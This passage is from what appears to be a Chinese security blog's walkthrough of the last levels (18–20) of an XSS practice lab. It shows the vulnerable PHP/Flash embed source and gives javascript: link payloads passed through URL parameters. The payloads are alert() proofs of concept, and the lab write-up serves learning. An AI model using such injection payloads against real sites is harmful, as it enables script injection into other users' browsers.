<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">&lt;!DOCTYPE html&gt;&lt;!--STATUS OK--&gt;&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">&lt;meta http-equiv=&quot;content-type&quot; content=&quot;text/html;charset=utf-8&quot;&gt;</span><br><span class="line">&lt;script&gt;</span><br><span class="line">window.alert = function()  </span><br><span class="line">&#123; </span><br><span class="line">confirm(&quot;完成的不错！&quot;);</span><br><span class="line"> window.location.href=&quot;level19.php?arg01=a&amp;arg02=b&quot;; </span><br><span class="line">&#125;</span><br><span class="line">&lt;/script&gt;</span><br><span class="line">&lt;title&gt;欢迎来到level18&lt;/title&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">&lt;h1 align=center&gt;欢迎来到level18&lt;/h1&gt;</span><br><span class="line">&lt;?php</span><br><span class="line">ini_set(&quot;display_errors&quot;, 0);</span><br><span class="line">echo &quot;&lt;embed src=xsf02.swf?&quot;.htmlspecialchars($_GET[&quot;arg01&quot;]).&quot;=&quot;.htmlspecialchars($_GET[&quot;arg02&quot;]).&quot; width=100% heigth=100%&gt;&quot;;</span><br><span class="line">?&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br><span class="line"></span><br><span class="line">感觉和17差不多，不多说了</span><br></pre></td></tr></table></figure>

<h3 id="Less-19"><a href="#Less-19" class="headerlink" title="Less-19"></a>Less-19</h3><blockquote>
<p>19 和20 难度较大，这里</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">&lt;!DOCTYPE html&gt;&lt;!--STATUS OK--&gt;&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">&lt;meta http-equiv=&quot;content-type&quot; content=&quot;text/html;charset=utf-8&quot;&gt;</span><br><span class="line">&lt;script&gt;</span><br><span class="line">window.alert = function()  </span><br><span class="line">&#123; </span><br><span class="line">confirm(&quot;完成的不错！&quot;);</span><br><span class="line"> window.location.href=&quot;level20.php?arg01=a&amp;arg02=b&quot;; </span><br><span class="line">&#125;</span><br><span class="line">&lt;/script&gt;</span><br><span class="line">&lt;title&gt;欢迎来到level19&lt;/title&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">&lt;h1 align=center&gt;欢迎来到level19&lt;/h1&gt;</span><br><span class="line">&lt;?php</span><br><span class="line">ini_set(&quot;display_errors&quot;, 0);</span><br><span class="line">echo &apos;&lt;embed src=&quot;xsf03.swf?&apos;.htmlspecialchars($_GET[&quot;arg01&quot;]).&quot;=&quot;.htmlspecialchars($_GET[&quot;arg02&quot;]).&apos;&quot; width=100% heigth=100%&gt;&apos;;</span><br><span class="line">?&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;&lt;/pre&gt;</span><br></pre></td></tr></table></figure>

<blockquote>
<p>这道题是flash xss</p>
</blockquote>
<p>不咋会做 放上payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">payload</span><br><span class="line">arg01=version&amp;arg02=&lt;a href=&quot;javascript:alert(40)&quot;&gt;123&lt;/a&gt;&lt;/pre&gt;</span><br></pre></td></tr></table></figure>

<h3 id="Less-20"><a href="#Less-20" class="headerlink" title="Less-20"></a>Less-20</h3><p>不会做</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">arg01=version&amp;arg02=&lt;a href=&quot;javascript:alert(41)&quot;&gt;123&lt;/a&gt;&lt;/pre&gt;</span><br></pre></td></tr></table></figure>

<hr>
<p>参考文章：</p>
<p><a href="https://www.jianshu.com/p/4e3a517bc4ea" target="_blank" rel="noopener">https://www.jianshu.com/p/4e3a517bc4ea</a></p>
<p><a href="https://www.cnblogs.com/bmjoker/p/9446472.html" target="_blank" rel="noopener">https://www.cnblogs.com/bmjoker/p/9446472.html</a></p>
<p><a href="https://blog.csdn.net/weixin_44077544/article/details/95174440" target="_blank" rel="noopener">https://blog.csdn.net/weixin_44077544/article/details/95174440</a></p>
	
	</div>
	
	<div id="current-post-cover" data-scr="/img/cart_cover.jpg"></div>

	<!-- relate post, comment...-->
	<div class="investment-container">
		<div class="investment-header">
			<div class="investment-title-1">
				<div class="on">相关文章</div>
				<div>评论</div>
				<div>分享</div>
			</div>
			<div class="investment-title-2">	            
				
	<span>
		<a href="javascript: window.scrollTo(0, 0);">返回顶部</a>
		
		
			<a href="/2019/10/04/实用技巧/配置nat实现网络互通/" title="配置NAT实现网络互通" rel="next">
				下一篇&raquo;
			</a>
			
	</span>


      		
			</div>	
		</div>
		
		<div class="investment-content">
			<div class="investment-content-list">
				

<div class="relate-post">
	
		<ul>
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2019/10/04/web安全/sql注入/DVWA 之SQL Injection/" title="DVWA 之SQL Injection">
								DVWA 之SQL Injection			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								十月 4日, 2019				
							</p>
							<p class="relate-post-content">
								SQL注入就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令


前言本文属于学习贴，我自己在学习的时候总结的，如有错误，请大家及时指出

dvwa v1.0.7

何为S...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2019/10/04/web安全/sql注入/DVWA 之SQL Injection/" title="DVWA 之SQL Injection">				
								
								<img class="lazy" src="/img/placeholder.jpg" data-src="/img/cart_cover.jpg" alt="DVWA 之SQL Injection"/>
							</a>
						</div>
					</li>											
			
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2019/10/04/web安全/shell/利用js文件反弹shell/" title="利用js文件反弹shell">
								利用js文件反弹shell			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								十月 4日, 2019				
							</p>
							<p class="relate-post-content">
								根据Jaky老哥的文章 复现一下反弹shell


前言本篇文章是按照大佬的文章复现本文只用于测试，请不要将其用于非法途径公众号： 洛米唯熊
环境
攻击： kaliip: 192.168.248.132
测试： windows 7 x...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2019/10/04/web安全/shell/利用js文件反弹shell/" title="利用js文件反弹shell">				
								
								<img class="lazy" src="/img/placeholder.jpg" data-src="/img/cart_cover.jpg" alt="利用js文件反弹shell"/>
							</a>
						</div>
					</li>											
			
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2019/10/04/web安全/远程文件包含/远程文件包含错误解决方法/" title="错误提示【URL file-access is disabled in the server configuration in】解决">
								错误提示【URL file-access is disabled in the server configuration in】解决			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								十月 4日, 2019				
							</p>
							<p class="relate-post-content">
								DVWA 初体验 远程文件包含错误，需要开启allow_url_include或者allow_url_ fopen


前言今天在做dvwa的file inclusion，发现远程 文件包含出错
解决方法可以看到提示的服务器配置中禁用...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2019/10/04/web安全/远程文件包含/远程文件包含错误解决方法/" title="错误提示【URL file-access is disabled in the server configuration in】解决">				
								
								<img class="lazy" src="/img/placeholder.jpg" data-src="/img/cart_cover.jpg" alt="错误提示【URL file-access is disabled in the server configuration in】解决"/>
							</a>
						</div>
					</li>											
			
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2019/10/04/web安全/sql注入/sql-lab-通关宝典/" title="sql-lab 复现通关（深入学习）">
								sql-lab 复现通关（深入学习）			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								十月 4日, 2019				
							</p>
							<p class="relate-post-content">
								Docker 搭建环境 sql-labs 通关




sql-lab 复现通关（深入学习）前言sqllab 从基础到复杂， 对于初学者练习非常有用。
目的学习如何进攻才能懂得如何防守
less-1 基于错误的单引号字符串123456...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2019/10/04/web安全/sql注入/sql-lab-通关宝典/" title="sql-lab 复现通关（深入学习）">				
								
								<img class="lazy" src="/img/placeholder.jpg" data-src="/img/cart_cover.jpg" alt="sql-lab 复现通关（深入学习）"/>
							</a>
						</div>
					</li>											
			
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2019/10/04/实用技巧/配置nat实现网络互通/" title="配置NAT实现网络互通">
								配置NAT实现网络互通			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								十月 4日, 2019				
							</p>
							<p class="relate-post-content">
								配置nat 实现主机互通


前言参加了拼客学院的第十期五天速成白帽子培训课，然后把一些常见的知识分享给大家
安装靶机下载的话网上都有直接去下就好了。
安装比较简单，这里推荐安装过程
Winxp安装教程
Win2003安装教程
配置N...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2019/10/04/实用技巧/配置nat实现网络互通/" title="配置NAT实现网络互通">				
								
								<img class="lazy" src="/img/placeholder.jpg" data-src="/img/cart_cover.jpg" alt="配置NAT实现网络互通"/>
							</a>
						</div>
					</li>											
			
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2019/10/04/实用技巧/CTF介绍/" title="CTF介绍">
								CTF介绍			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								十月 4日, 2019				
							</p>
							<p class="relate-post-content">
								刚开始接触CTF,对于misc，reverse等等都傻傻分不清，所以专门去查了下这些名词，给没有接触CTF的童鞋一点入门基础.


前言刚开始接触CTF,对于misc，reverse等等都傻傻分不清，所以专门去查了下这些名词，给没有接...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2019/10/04/实用技巧/CTF介绍/" title="CTF介绍">				
								
								<img class="lazy" src="/img/placeholder.jpg" data-src="/img/cart_cover.jpg" alt="CTF介绍"/>
							</a>
						</div>
					</li>											
			
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2019/10/04/实用技巧/DVWA 如何查看登录密码并修改/" title="DVWA 查看默认密码">
								DVWA 查看默认密码			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								十月 4日, 2019				
							</p>
							<p class="relate-post-content">
								如何数据库查看dvwa的密码，跳过密码验证


前言今天登录dvwa的时候发现密码错误，尝试了我自己常设置的密码后都没有结果，就决定去数据库查看dvwa的密码。话不多说，直接开始操作
dvwa默认密码如果小伙伴们只需要dvwa的默认密...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2019/10/04/实用技巧/DVWA 如何查看登录密码并修改/" title="DVWA 查看默认密码">				
								
								<img class="lazy" src="/img/placeholder.jpg" data-src="/img/cart_cover.jpg" alt="DVWA 查看默认密码"/>
							</a>
						</div>
					</li>											
			
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2019/10/04/实用技巧/Markdown语法介绍/" title="Markdown编辑器语法">
								Markdown编辑器语法			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								十月 4日, 2019				
							</p>
							<p class="relate-post-content">
								Markdown是一种轻量级标记语言,它允许人们“使用易读易写的纯文本格式编写文档，然后转换有效的XHTML或者HTML文档”，这种语言吸收了很多电子邮件中已有的纯文本标记的特性。


前言为什么要写博客
先谈论一个话外题，为什么选择...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2019/10/04/实用技巧/Markdown语法介绍/" title="Markdown编辑器语法">				
								
								<img class="lazy" src="/img/placeholder.jpg" data-src="/img/cart_cover.jpg" alt="Markdown编辑器语法"/>
							</a>
						</div>
					</li>											
			
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2019/10/04/实用技巧/OWASP TOP 10/" title="OWASP Top 10简要介绍">
								OWASP Top 10简要介绍			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								十月 4日, 2019				
							</p>
							<p class="relate-post-content">
								为了加深对owasp top 10 的印象 ，写一篇作为记录


前言
最近在找实习，看到招聘全是要求熟悉OWASP Top 10,为了加深印象所以写一个博客记录一下 ,也希望可以为有相同需求的小伙伴提供好的资料,之后我会陆续更新相关...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2019/10/04/实用技巧/OWASP TOP 10/" title="OWASP Top 10简要介绍">				
								
								<img class="lazy" src="/img/placeholder.jpg" data-src="/img/cart_cover.jpg" alt="OWASP Top 10简要介绍"/>
							</a>
						</div>
					</li>											
			
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2019/10/04/CTF/墨者学院/SQL注人(时间盲注)/" title="SQL注入(时间盲注)">
								SQL注入(时间盲注)			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								十月 4日, 2019				
							</p>
							<p class="relate-post-content">
								了解盲注语法，如何利用盲注获取数据


目标
了解SQL时间盲注
掌握SQL注入语法
掌握SQL注入原理
了解SQL注入常用注释字符
本题使用的工具  sqlmap，hackbar环境  物理机：windows10  虚拟机：kali...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2019/10/04/CTF/墨者学院/SQL注人(时间盲注)/" title="SQL注入(时间盲注)">				
								
								<img class="lazy" src="/img/placeholder.jpg" data-src="/img/cart_cover.jpg" alt="SQL注入(时间盲注)"/>
							</a>
						</div>
					</li>											
			
			
		</ul>
	
</div>	
			</div>
			<div class="investment-content-list">
				<div class="layout-comment">

	

		

			<!-- I don't know !!!-->
			<div>Please check the comment setting in config.yml of hexo-theme-Annie!</div>
			
		
		
	

</div>
			</div>
			<div class="investment-content-list">
				<div class="layout-share">
	
	

		
			
			<!-- socialShare share -->
			<div class="social-share"></div>

<!--  css & js -->
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/css/share.min.css">
<script async src="https://cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/js/social-share.min.js"></script>
			
		
		
	
</div>


			</div>
		</div>	
	</div>
	</div>
</div>



	<!-- leancloud -->
	<!--
	时间：2018-11-27
	描述：
		文章访问量：visitors
		文章喜欢量：likes	
		文章排行榜：topNPost
		其他得说明：
			01-Cookie相关的函数 
				https://blog.csdn.net/somehow1002/article/details/78511541（Author：somehow1002）
			02-visitors相关的函数 
				https://blog.csdn.net/u013553529/article/details/63357382（Author：爱博客大伯）
				https://notes.doublemine.me/2015-10-21-为NexT主题添加文章阅读量统计功能.html（Author：夏末）
			03-topNPost相关的函数
				https://hoxis.github.io/hexo-next-read-rank.html（Author：hoxis）
			04-likes相关的函数，
				参考了01 & 02进行简单的设计与实现
-->



	<script>
		var appid = 'nvd69LH66AqtfBomoagKzq9T-gzGzoHsz',
            appkey = 'tXeQfaUF0IR9Ir5vjSU0DnjT';	  
        AnnieLeancloud(appid, appkey);         
	</script>
    

	


<!-- show math formula -->



	 
	<script src="/plugin/clipboard/clipboard.js"></script>
	<script>
		// Copy code !
	    function codePreprocessing() {
	        $("#article-content .highlight").each(function() {

	            $(this).wrap('<div id="post-code"></div>');

	        })

	        $("#article-content #post-code").each(function() {

	            $(this).prepend('<nav class="copy-nav"><span><i class="code-language"></i></span></nav>');

	        })

	        $("#article-content .copy-nav").each(function() {
	            var temp = $(this).next().attr('class'),
	                language = ((temp.length > 9) && (temp != null)) ? temp.substr(10) : "none"; //why 9? Need to check language?

	            $(this).find('.code-language').text(language);

	            $(this).append('<span class="copy-btn"><i class="fa fa-copy" aria-hidden="true"></i></span>');

	        });
	    }

		function codeCopy() {
		    $('#article-content #post-code').each(function(i) {
		        var codeCopyId = 'codeCopy-' + i;

		        var codeNode = $(this).find('.code'),
		            copyButton = $(this).find('.copy-btn');

		        codeNode.attr('id', codeCopyId);
		        copyButton.attr('data-clipboard-target-id', codeCopyId);
		    })

		    
			var clipboard = new ClipboardJS('.copy-btn', {
					target: function(trigger) {
						return document.getElementById(trigger.getAttribute('data-clipboard-target-id'));
					}
		      	});

			//pure js
			function showTooltip(elem, msg) {		   
				elem.setAttribute('aria-label', msg);
				elem.setAttribute('class', 'copy-btn copy-status');
				setTimeout(function() {
					elem.setAttribute('class', 'copy-btn');
				}, 2000);
			}

			clipboard.on('success', function(e) {
			    e.clearSelection();
			    console.info('Action:', e.action);		   
			    console.info('Trigger:', e.trigger);
			    showTooltip(e.trigger, 'Copied!');
			    
			});
			clipboard.on('error', function(e) {
			    console.error('Action:', e.action);
			    console.error('Trigger:', e.trigger);
			});
		

		}

		if ($('.layout-post').length) {
		    codePreprocessing();
		    codeCopy();
		} 
	</script>





<link rel="stylesheet" href="/plugin/fancybox/jquery.fancybox.css">
<script src="/plugin/fancybox/jquery.fancybox.js"></script>

<script type="text/javascript">
	var titleID = $('.article-title a'),
		imageID = $('.article-content img'),
		videoID = $('.article-content video');

	var postTitle = titleID.text() ? titleID.text() : "No post title!";

	imageID.each(function() {
		var imgPath = $(this).attr('src'),
			imgTitle = $(this).attr('alt') ? $(this).attr('alt') : "No image description!";

		//给每个匹配的<img>元素打包, 即添加父元素<a>
		$(this).wrap('<a data-fancybox="gallery" data-caption=" 《 ' + postTitle + ' 》 ' + imgTitle + ' "  href=" ' + imgPath + ' "> </a>');
	});

	videoID.each(function() {
		var videoPath = $(this).attr('src');

		//给每个匹配的<img>元素打包, 即添加父元素<a>
		$(this).wrap('<a data-fancybox href=" ' + videoPath + ' "> </a>');
	});
	//TODO：支持html5 video

	if($('#layout-post').length) {
		$('[data-fancybox="gallery"]').fancybox({
			loop: true,
			buttons: [
				"zoom",
				"share",
				"slideShow",
				"fullScreen",
				//"download",
				"thumbs",
				"close"
			],
			protect: false
		});
	}
</script>
		</main>

		<!--footer-->
		<footer>
	<div class="social">
		<ul>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<i class="fa fa-github"></i>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<i class="fa fa-weibo"></i>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<i class="fa fa-pinterest"></i>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<i class="fa fa-instagram"></i>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<i class="fa fa-twitter"></i>
			</a>
		</li>
	
		<li>
			<a href="/atom.xml" target="_blank">
				<i class="fa fa-rss"></i>
			</a>
		</li>
			
</ul>

	</div>
		
	<div class="copyright">
		<p>
			 
				&copy;2019, content by ST0new. All Rights Reserved.
			
			
			

	<!-- busuanzi -->
	<!-- busuanzi -->

		
	<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
	

		<span id="busuanzi_container_page_pv">
	  		本文总阅读量<span id="busuanzi_value_page_pv"></span>次
		</span>

	




		</p>
		<p>
			<a href="http://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a> Theme <a href="https://github.com/Sariay/hexo-theme-Annie" title="Annie" target="_blank" rel="noopener">Annie</a> by Sariay.
			<a href="javascript:zh_tran('s');" class="zh_click" id="zh_click_s">简体</a> 
			<a href="javascript:zh_tran('t');" class="zh_click" id="zh_click_t">繁體</a>				
		</p>
	</div>		
</footer>
		
	<!-- set '1' to show motto in all pages! -->

	<script src="/plugin/motto/motto.js"></script>
	
	<script type="text/javascript">
		$(".motto").html( getMingYanContent() );
	</script>	




	<!--
	时间：2018-10-3
	描述：
		插件名称：hexo-generator-search-zip
		插件来源: https://github.com/SuperKieran/hexo-generator-search-zip
		代码参考：https://github.com/SuperKieran/TKL/blob/master/layout/_partial/search.ejs(Include: js & css)	
-->
<div class="popup search-popup local-search-popup" >
	<div class="local-search-container">
		<span class="popup-btn-close">
      		ESC
   		</span>
		<div class="local-search-header">
			<div class="input-prompt">				
			</div>
			<input autocomplete="off" placeholder="Search..." type="text" id="local-search-input">
		</div>
		<div class="local-search-body">
			<div id="local-search-output"></div>
		</div>
		<div class="local-search-footer">
			<div class="topN-post">				
				

   
	<div id="topN">
		<div class="topN-title" data-title= "热门文章"></div> 
	</div>
	
    <script>
        var appid = 'nvd69LH66AqtfBomoagKzq9T-gzGzoHsz',
            appkey = 'tXeQfaUF0IR9Ir5vjSU0DnjT',
            limitCount = 10;
        if( $('#topN').length ){
            AV.initialize(appid, appkey);
            var Counter = AV.Object.extend("Counter");  
            topNPost(Counter, limitCount);
        }
    </script>
   
								
			</div>
		</div>
	</div>
</div>

<script src="/plugin/search/ziploader.js"></script>
<script src="/plugin/search/search.js"></script>

<script type="text/javascript">
	var search_path = 'search.json',
		zip_Path = '/search.zip',
		version_Path = '/searchVersion.txt',
		input_Trigger = 'auto',
		top_N = '2';

	themeLocalSearch({
		search_path, 
		zip_Path, 
		version_Path, 
		input_Trigger, 
		top_N
	});
</script>


<!-- love effect -->

	<script src="/plugin/love/love.js"></script>


<!-- back to top -->

	
	<div id="totop">
  		<a href="javascript:;"  name="TOTOP" class="fa fa-arrow-up" ></a>
	</div>




<!-- site analysis -->


	<!-- site-analysis -->
	
	
	
	
	
 

<script src="/plugin/vibrant/vibrant.js"></script>
<script src="/plugin/chinese/chinese.js"></script>
<script src="/plugin/imgLazyLoader/yall.min.js"></script>
<script src="/plugin/imgResize/jquery.resizeimagetoparent.min.js"></script>
<script src="/plugin/nicescroll/jquery.nicescroll.js"></script>
<script src="/js/resizediv.js"></script>
<script src="/js/main.js"></script>
	</body>	
</html>